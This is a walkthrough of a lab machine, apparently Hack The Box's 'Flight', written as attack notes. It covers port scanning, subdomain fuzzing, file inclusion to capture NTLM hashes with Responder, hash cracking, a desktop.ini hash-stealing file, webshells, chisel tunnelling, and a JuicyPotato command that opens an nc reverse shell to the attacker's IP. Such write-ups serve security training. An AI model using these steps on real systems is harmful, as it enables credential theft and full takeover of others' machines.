PORT SCAN
# Nmap 7.93 scan initiated Wed Dec 21 02:42:29 2022 as: nmap -p- --min-rate=10000 -sC -sV -oN portscan.txt 10.10.11.187
Nmap scan report for 10.10.11.187
Host is up (0.14s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-21 14:43:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-12-21T14:43:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 21 02:44:38 2022 -- 1 IP address (1 host up) scanned in 128.51 seconds
The domain we found flight.htb
Content, subdomain enum
wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154
000000624: 200 90 L 412 W 3996 Ch "school"subdomains we found school
The view is vulnerable to vLFI
We can get the file source code. Also we can use this code to force the service to fetch a remote source using Windows network share syntax //<ip>/share and maybe will capture the hash of service.
Capture service account hash
In browser**http://school.flight.htb/index.php?view=//<ip>/test**
In bash
sudo responder -I tun0 -wP
We get the flight\svc_apache account hash.
If we want to make better use of the hash , we need to crack it violently with hashcat.
SMB
From above, we get the svc_apacheand its password. Next step use them to acess SMB Service
C.Bum user we should take more attention to it.
AD ENUM
After AD enum, we found lots of user. But only S.Moon is the same password assvc_apache
Get user shell [C.bum]
If we don’t know which share directory is writable we can use impacket-psexec.
Create a desktop.ini file with the following content. For more detail, refer to
https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini
[.ShellClassInfo]
IconResource=\\<ip>\testAfter we uploading this file to smb: Share. We can setup responder again and capture the c.bumhash.
upload the webshell to school.flight.htb or flight.htb. Using the powershell to connect the machine.
Switch to c.bum shell using runascs.
Get the root shell
netstat -ano
We found port 8000 running process with PID 4. PID 4 is running as system process.
We have to pivot to examine further into this intranet process.
We use chisel to make the port we can acess.
Bash
./chisel server -p 4000 --reverseWindows Powershell
upload the aspx webshell cmdasp.aspx
Get the iis apppool shell
The iis service has SeImpersonatePrivilege privilege. This can be exploited using juicypotato
potato.exe -t * -p "C:\users\public\download\nc64.exe" -a "10.10.16.10 9010 -e cmd.exe"